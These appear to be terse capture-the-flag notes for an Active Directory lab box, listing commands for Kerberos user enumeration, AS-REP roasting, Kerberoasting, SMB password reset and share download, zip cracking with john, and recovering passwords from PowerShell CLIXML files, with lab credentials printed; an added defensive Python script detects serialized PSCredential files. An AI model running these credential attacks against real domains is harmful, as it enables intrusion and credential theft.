RazorBlack

./kerbrute_linux_386 userenum -d raz0rblack.thm --dc 10.10.241.105 users.txt
showmount -e 10.10.241.105

I opened the Excel file and found users.

AS-REP Roasting

impacket-GetNPUsers raz0rblack.thm/ -dc-ip 10.10.194.110  -usersfile users.txt -format john -outputfile crackme.txt -no-pass -request

user cracked

twilliams:roastpotatoes

Targeted Kerberoast

impacket-GetUserSPNs raz0rblack.thm/twilliams:roastpotatoes -dc-ip 10.10.35.193 -request

xyan1d3:cyanide9amine5628

I found a local domain user and ran secretsdump.

xyan1d3.xml

impacket-smbpasswd sbradley@10.10.108.185

Use smbmap to list the shared files

smbmap -H 10.10.108.185 -u 'sbradley' -p '1234@Asd' -r trash --download trash/experiment_gone_wrong.zip
zip2john file.zip > ziphash
john ziphash --wordlist=/usr/share/wordlists/rockyou.txt
$Credential = Import-Clixml -Path "root.xml"
$Credential.GetNetworkCredential().password

Import-Clixml -Path "xyan1d3.xml": This command imports data from an XML file named "xyan1d3.xml". The XML file should contain a serialized PSCredential object. This method is commonly used for securely storing and retrieving credentials.
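
A defender's check for the file type described above, as an added example that is not part of the original notes: it parses CLIXML and reports every serialized PSCredential, flagging whether the password blob carries the DPAPI header. The function name and the sample document are constructed for illustration.

```python
import xml.etree.ElementTree as ET

NS = {"ps": "http://schemas.microsoft.com/powershell/2004/04"}
CRED_TYPE = "System.Management.Automation.PSCredential"
# DPAPI blob header: version 1, then provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb in its in-memory byte order.
DPAPI_HEADER = "01000000d08c9ddf0115d1118c7a00c04fc297eb"

def find_pscredentials(clixml):
    """Report each serialized PSCredential in a CLIXML document (str or bytes)."""
    root = ET.fromstring(clixml)
    type_tables, findings = {}, []
    for obj in root.iter("{%s}Obj" % NS["ps"]):
        tn, ref = obj.find("ps:TN", NS), obj.find("ps:TNRef", NS)
        if tn is not None:  # first use of a type list defines it
            types = [t.text for t in tn.findall("ps:T", NS)]
            type_tables[tn.get("RefId")] = types
        elif ref is not None:  # later objects refer back to it by RefId
            types = type_tables.get(ref.get("RefId"), [])
        else:
            types = []
        if CRED_TYPE not in types:
            continue
        user = obj.find("ps:Props/ps:S[@N='UserName']", NS)
        secret = obj.find("ps:Props/ps:SS[@N='Password']", NS)
        blob = (secret.text or "").strip().lower() if secret is not None else ""
        findings.append({
            "username": user.text if user is not None else None,
            # False means the blob is not DPAPI output, e.g. exported by
            # PowerShell on Linux/macOS, where it is obfuscated, not encrypted.
            "dpapi_protected": blob.startswith(DPAPI_HEADER),
            "blob_bytes": len(blob) // 2,
        })
    return findings

# Constructed sample: two credential objects, not taken from any real host.
SAMPLE = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCredential</T><T>System.Object</T></TN>
    <Props><S N="UserName">EXAMPLE\\svc-backup</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb00000000000000000000000000000000</SS></Props></Obj>
  <Obj RefId="1"><TNRef RefId="0" />
    <Props><S N="UserName">localadmin</S>
      <SS N="Password">680075006e0074006500720032002100</SS></Props></Obj>
</Objs>"""

if __name__ == "__main__":
    for finding in find_pscredentials(SAMPLE):
        print(finding)
```

A DPAPI-protected blob only decrypts for the user who exported it on the machine where it was exported, so any such file readable by other accounts on that host or left on a share is worth rotating and removing.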

Convert SecureString to Plain Text (if absolutely necessary, but not recommended due to security concerns):
